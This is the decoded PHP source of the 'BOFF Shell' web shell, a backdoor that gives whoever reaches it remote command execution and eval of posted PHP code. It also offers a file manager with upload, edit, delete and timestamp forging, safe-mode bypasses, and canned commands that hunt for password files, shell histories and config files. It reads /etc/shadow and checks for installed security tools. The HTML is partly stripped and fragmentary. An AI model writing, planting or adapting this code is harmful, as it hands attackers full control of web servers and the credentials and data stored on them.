/* Decoded by unphp.net */ ?>b' Authorization
ß0ff \/\/3ß $|-|311 1.0
Password: >\'>
"); } if(!isset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])])) if( empty($auth_pass) || ( isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $auth_pass) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true; else BOFFLogin(); if(strtolower(substr(PHP_OS,0,3)) == "win") $os = \'win\'; else $os = \'nix\'; $safe_mode = @ini_get(\'safe_mode\'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get(\'disable_functions\'); $home_cwd = @getcwd(); if(isset($_POST[\'c\'])) @chdir($_POST[\'c\']); $cwd = @getcwd(); if($os == \'win\') { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\'; if(!isset($_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$GLOBALS[\'default_use_ajax\']; if($os == \'win\') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function BOFFHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = $GLOBALS[\'default_charset\']; global $color; echo "" . $_SERVER[\'HTTP_HOST\'] . " - BOFF " . BOFF_VERSION ."
"; $freeSpace = @diskfreespace($GLOBALS[\'cwd\']); $totalSpace = @disk_total_space($GLOBALS[\'cwd\']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname(\'r\'); $kernel = @php_uname(\'s\'); $explink = \'http://exploit-db.com/list.php?description=\'; if(strpos(\'Linux\', $kernel) !== false) $explink .= urlencode(\'Linux Kernel \' . substr($release,0,6)); else $explink .= urlencode($kernel . \' \' . substr($release,0,3)); if(!function_exists(\'posix_getegid\')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid[\'name\']; $uid = $uid[\'uid\']; $group = $gid[\'name\']; $gid = $gid[\'gid\']; } $cwd_links = \'\'; $path = explode("/", $GLOBALS[\'cwd\']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\'); $opt_charsets = \'\'; foreach($charsets as $item) $opt_charsets .= \'\'; $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Safe mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\'); if(!empty($GLOBALS[\'auth_pass\'])) $m[\'Logout\'] = \'Logout\'; $m[\'Self remove\'] = \'SelfRemove\'; $menu = \'\'; foreach($m as $k => $v) $menu .= \'[ \'.$k.\' ]\'; $drives = ""; if($GLOBALS[\'os\'] == \'win\') { foreach(range(\'c\',\'z\') as $drive) if(is_dir($drive.\':\\')) $drives .= \'[ \'.$drive.\' ] \'; } echo \'\' . \'\' . \'
Uname:
User:
Php:
Hdd:
Cwd:\' . ($GLOBALS[\'os\'] == \'win\'?\'
Drives:\':\'\') . \'		\' . substr(@php_uname(), 0, 120) . \' [exploit-db.com]
\' . $uid . \' ( \' . $user . \' ) Group: \' . $gid . \' ( \' . $group . \' )
\' . @phpversion() . \' Safe mode: \' . ($GLOBALS[\'safe_mode\']?\'ON\':\'OFF\') . \' [ phpinfo ] Datetime: \' . date(\'Y-m-d H:i:s\') . \'
\' . BOFFViewSize($totalSpace) . \' Free: \' . BOFFViewSize($freeSpace) . \' (\'. (int) ($freeSpace/$totalSpace*100) . \'%)
\' . $cwd_links . \' \'. BOFFPermsColor($GLOBALS[\'cwd\']) . \' [ home ]
\' . $drives . \'
Server IP:
\' . @$_SERVER["SERVER_ADDR"] . \'
Client IP:
\' . $_SERVER[\'REMOTE_ADDR\'] . \'
\' . \'\' . $menu . \'
\'; } function BOFFFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?" (Writeable)":" (Not writable)"; echo "
Change dir:
>\'>
Read file:
>\'>
Make dir:$is_writable
>\'>
Make file:$is_writable
>\'>
Execute:
>\'>
Upload file:$is_writable
>\'>
"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) { function posix_getgrgid($p) {return false;} } function BOFFEx($in) { $out = \'\'; if (function_exists(\'exec\')) { @exec($in,$out); $out = @join(" ",$out); } elseif (function_exists(\'passthru\')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists(\'system\')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function BOFFViewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\'; elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\'; elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\'; else return $s . \' B\'; } function BOFFPerms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\'; elseif (($p & 0xA000) == 0xA000)$i = \'l\'; elseif (($p & 0x8000) == 0x8000)$i = \'-\'; elseif (($p & 0x6000) == 0x6000)$i = \'b\'; elseif (($p & 0x4000) == 0x4000)$i = \'d\'; elseif (($p & 0x2000) == 0x2000)$i = \'c\'; elseif (($p & 0x1000) == 0x1000)$i = \'p\'; else $i = \'u\'; $i .= (($p & 0x0100) ? \'r\' : \'-\'); $i .= (($p & 0x0080) ? \'w\' : \'-\'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\')); $i .= (($p & 0x0020) ? \'r\' : \'-\'); $i .= (($p & 0x0010) ? \'w\' : \'-\'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\')); $i .= (($p & 0x0004) ? \'r\' : \'-\'); $i .= (($p & 0x0002) ? \'w\' : \'-\'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\')); return $i; } function BOFFPermsColor($f) { if (!@is_readable($f)) return \'\' . BOFFPerms(@fileperms($f)) . \'\'; elseif (!@is_writable($f)) return \'\' . BOFFPerms(@fileperms($f)) . \'\'; else return \'\' . BOFFPerms(@fileperms($f)) . \'\'; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function BOFFWhich($p) { $path = BOFFEx(\'which \' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { BOFFHeader(); echo \'

Server security information

\'; function BOFFSecParam($n, $v) { $v = trim($v); if($v) { echo \'\' . $n . \': \'; if(strpos($v, " ") === false) echo $v . \'
\'; else echo \'
\' . $v . \'
\'; } } BOFFSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\')); if(function_exists(\'apache_get_modules\')) BOFFSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules())); BOFFSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\'); BOFFSecParam(\'Open base dir\', @ini_get(\'open_basedir\')); BOFFSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\')); BOFFSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\')); BOFFSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\'); $temp=array(); if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL"; if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL"; if(function_exists(\'oci_connect\')) $temp[] = "Oracle"; BOFFSecParam(\'Supported databases\', implode(\', \', $temp)); echo \'
\'; if($GLOBALS[\'os\'] == \'nix\') { BOFFSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes [view]":\'no\'); BOFFSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes [view]":\'no\'); BOFFSecParam(\'OS version\', @file_get_contents(\'/proc/version\')); BOFFSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\')); if(!$GLOBALS[\'safe_mode\']) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\'); $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\'); $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\'); echo \'
\'; $temp=array(); foreach ($userful as $item) if(BOFFWhich($item)) $temp[] = $item; BOFFSecParam(\'Userful\', implode(\', \',$temp)); $temp=array(); foreach ($danger as $item) if(BOFFWhich($item)) $temp[] = $item; BOFFSecParam(\'Danger\', implode(\', \',$temp)); $temp=array(); foreach ($downloaders as $item) if(BOFFWhich($item)) $temp[] = $item; BOFFSecParam(\'Downloaders\', implode(\', \',$temp)); echo \'
\'; BOFFSecParam(\'HDD space\', BOFFEx(\'df -h\')); BOFFSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\')); } } else { BOFFSecParam(\'OS Version\',BOFFEx(\'ver\')); BOFFSecParam(\'Account Settings\',BOFFEx(\'net accounts\')); BOFFSecParam(\'User Accounts\',BOFFEx(\'net user\')); } echo \'
\'; BOFFFooter(); } function actionPhp() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = true; ob_start(); eval($_POST[\'p1\']); $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'" . addcslashes(htmlspecialchars(ob_get_clean()), " \\'") . "\'; "; echo strlen($temp), " ", $temp; exit; } BOFFHeader(); if(isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\')) { echo \'

PHP info

\'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(\'!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU\',\'\',$tmp); $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp); echo str_replace(\'
\'; } if(empty($_POST[\'ajax\']) && !empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = false; echo \'

Execution PHP-code

\'; echo \' send using AJAX
\';
	if(!empty($_POST[\'p1\'])) {
		ob_start();
		eval($_POST[\'p1\']);
		echo htmlspecialchars(ob_get_clean());
	}
	echo \'
\'; BOFFFooter(); } function actionFilesMan() { BOFFHeader(); echo \'

File manager

\'; if(!empty($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!"; break; case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir"; break; case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { if($f == \'..\') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.\'/\',$f, $d.$s.\'/\'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'c\'],$f, $GLOBALS[\'cwd\']); } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.\'/\',$f, $d.$s.\'/\'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'c\'].$f, $GLOBALS[\'cwd\'].$f); } elseif($_SESSION[\'act\'] == \'zip\') { if(class_exists(\'ZipArchive\')) { $zip = new ZipArchive(); if ($zip->open($_POST[\'p2\'], 1)) { chdir($_SESSION[\'c\']); foreach($_SESSION[\'f\'] as $f) { if($f == \'..\') continue; if(@is_file($_SESSION[\'c\'].$f)) $zip->addFile($_SESSION[\'c\'].$f, $f); elseif(@is_dir($_SESSION[\'c\'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\')); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS[\'cwd\']); $zip->close(); } } } elseif($_SESSION[\'act\'] == \'unzip\') { if(class_exists(\'ZipArchive\')) { $zip = new ZipArchive(); foreach($_SESSION[\'f\'] as $f) { if($zip->open($_SESSION[\'c\'].$f)) { $zip->extractTo($GLOBALS[\'cwd\']); $zip->close(); } } } } elseif($_SESSION[\'act\'] == \'tar\') { chdir($_SESSION[\'c\']); $_SESSION[\'f\'] = array_map(\'escapeshellarg\', $_SESSION[\'f\']); BOFFEx(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_SESSION[\'f\'])); chdir($GLOBALS[\'cwd\']); } unset($_SESSION[\'f\']); break; default: if(!empty($_POST[\'p1\'])) { $_SESSION[\'act\'] = @$_POST[\'p1\']; $_SESSION[\'f\'] = @$_POST[\'f\']; foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f); $_SESSION[\'c\'] = @$_POST[\'c\']; } break; } } $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']); if($dirContent === false) { echo \'Can\'t open this folder!\';BOFFFooter(); return; } global $sort; $sort = array(\'name\', 1); if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])), \'perms\' => BOFFPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\')); elseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\']))); elseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\')); } $GLOBALS[\'sort\'] = $sort; function BOFFCmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1); else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1); } usort($files, "BOFFCmp"); usort($dirs, "BOFFCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo \'\'; $l = $l?0:1; } echo "
NameSizeModifyOwner/GroupPermissionsActions
\'.htmlspecialchars($f[\'name\']):\'g(\'FilesMan\',\'\'.$f[\'path\'].\'\');" title=\' . $f[\'link\'] . \'>[ \' . htmlspecialchars($f[\'name\']) . \' ]\').\'\'.(($f[\'type\']==\'file\')?BOFFViewSize($f[\'size\']):$f[\'type\']).\'\'.$f[\'modify\'].\'\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'\'.$f[\'perms\'] .\'R T\'.(($f[\'type\']==\'file\')?\' E D\':\'\').\'
 "; if(!empty($_SESSION[\'act\']) && @count($_SESSION[\'f\']) && (($_SESSION[\'act\'] == \'zip\') || ($_SESSION[\'act\'] == \'tar\'))) echo "file name:  "; echo ">\'>
"; BOFFFooter(); } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'binhex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', ); if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true; ob_start(); if(in_array($_POST[\'p1\'], $stringTools)) echo $_POST[\'p1\']($_POST[\'p2\']); $temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean())," \\'")."\'; "; echo strlen($temp), " ", $temp; exit; } BOFFHeader(); echo \'

String conversions

\'; if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false; echo "
>\'/> send using AJAX
";
	if(!empty($_POST[\'p1\'])) {
		if(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));
	}
	echo"

Search text in files:

Text:
Path:
Name:
>\'>
"; function BOFFRecursiveGlob($path) { if(substr($path, -1) != \'/\') $path.=\'/\'; $paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) BOFFRecursiveGlob($item); } else { if(@strpos(@file_get_contents($item), @$_POST[\'p2\'])!==false) echo "".htmlspecialchars($item)."
"; } } } } if(@$_POST[\'p3\']) BOFFRecursiveGlob($_POST[\'c\']); echo "

Search for hash:







"; BOFFFooter(); } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']); if(@$_POST[\'p2\']==\'download\') { if(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST[\'p1\'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST[\'p1\'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\'); if($fp) { $_POST[\'p2\'] = "edit"; fclose($fp); } } } BOFFHeader(); echo \'

File tools

\'; if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\'; BOFFFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\'])); if(!$uid) { $uid[\'name\'] = @fileowner($_POST[\'p1\']); $gid[\'name\'] = @filegroup($_POST[\'p1\']); } else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\'])); echo \'Name: \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' Size: \'.(is_file($_POST[\'p1\'])?BOFFViewSize(filesize($_POST[\'p1\'])):\'-\').\' Permission: \'.BOFFPermsColor($_POST[\'p1\']).\' Owner/Group: \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'
\'; echo \'Create time: \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' Access time: \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' Modify time: \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'

\'; if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\'; if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\'); else $m = array(\'Chmod\', \'Rename\', \'Touch\'); foreach($m as $v) echo \'\'.((strtolower($v)==@$_POST[\'p2\'])?\'[ \'.$v.\' ]\':$v).\' \'; echo \'

\'; switch($_POST[\'p2\']) { case \'view\': echo \'
\';
			$fp = @fopen($_POST[\'p1\'], \'r\');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo \'
\'; break; case \'highlight\': if( @is_readable($_POST[\'p1\']) ) { echo \'
\'; $code = @highlight_file($_POST[\'p1\'],true); echo str_replace(array(\'\'), array(\'\'),$code).\'
\'; } break; case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0; for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1)); if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\'t set permissions!
\'; } clearstatcache(); echo \'
\'; break; case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\'t writeable\'; break; } if( !empty($_POST[\'p3\']) ) { $time = @filemtime($_POST[\'p1\']); $_POST[\'p3\'] = substr($_POST[\'p3\'],1); $fp = @fopen($_POST[\'p1\'],"w"); if($fp) { @fwrite($fp,$_POST[\'p3\']); @fclose($fp); echo \'Saved!
\'; @touch($_POST[\'p1\'],$time,$time); } } echo \'
\'; break; case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']); $n = 0; $h = array(\'00000000
\',\'\',\'\'); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \'; switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \'; break; case 9: $h[2] .= \' \'; break; case 10: $h[2] .= \' \'; break; case 13: $h[2] .= \' \'; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'
\';} $h[1] .= \'
\'; $h[2] .= " "; } } echo \'
\'.$h[0].\'
\'.$h[1].\'
\'.htmlspecialchars($h[2]).\'
\'; break; case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\'t rename!
\'; else die(\'\'); } echo \'
\'; break; case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']); if($time) { if(!touch($_POST[\'p1\'],$time,$time)) echo \'Fail!\'; else echo \'Touched!\'; } else echo \'Bad time format!\'; } clearstatcache(); echo \'
\'; break; } echo \'
\'; BOFFFooter(); } function actionSafeMode() { $temp=\'\'; ob_start(); switch($_POST[\'p1\']) { case 1: $temp=@tempnam($test, \'cx\'); if(@copy("compress.zlib://".$_POST[\'p2\'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo \'Sorry... Can\'t open file\'; break; case 2: $files = glob($_POST[\'p2\'].\'*\'); if( is_array($files) ) foreach ($files as $filename) echo $filename." "; break; case 3: $ch = curl_init("file://".$_POST[\'p2\']."".preg_replace(\'!\(\d+\)\s.*!\', \'\', __FILE__)); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST[\'p2\']); break; case 5: for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) { $uid = @posix_getpwuid($_POST[\'p2\']); if ($uid) echo join(\':\',$uid)." "; } break; } $temp = ob_get_clean(); BOFFHeader(); echo \'

Safe mode bypass

\'; echo \'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To
\'; if($temp) echo \'
\'.htmlspecialchars($temp).\'
\'; echo \'
\'; BOFFFooter(); } function actionConsole() { if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\'] = true; $_POST[\'p1\'] .= \' 2>&1\'; } elseif(!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\'] = false; if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true; ob_start(); echo "d.cf.cmd.value=\'\'; "; $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes(" $ ".$_POST[\'p1\']." ".BOFFEx($_POST[\'p1\'])," \\'")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd(); echo "c_=\'".$GLOBALS[\'cwd\']."\';"; } } echo "d.cf.output.value+=\'".$temp."\';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), " ", $temp; exit; } BOFFHeader(); echo ""; echo \'

Console

send using AJAX redirect stderr to stdout (2>&1)
$
\'; echo \'
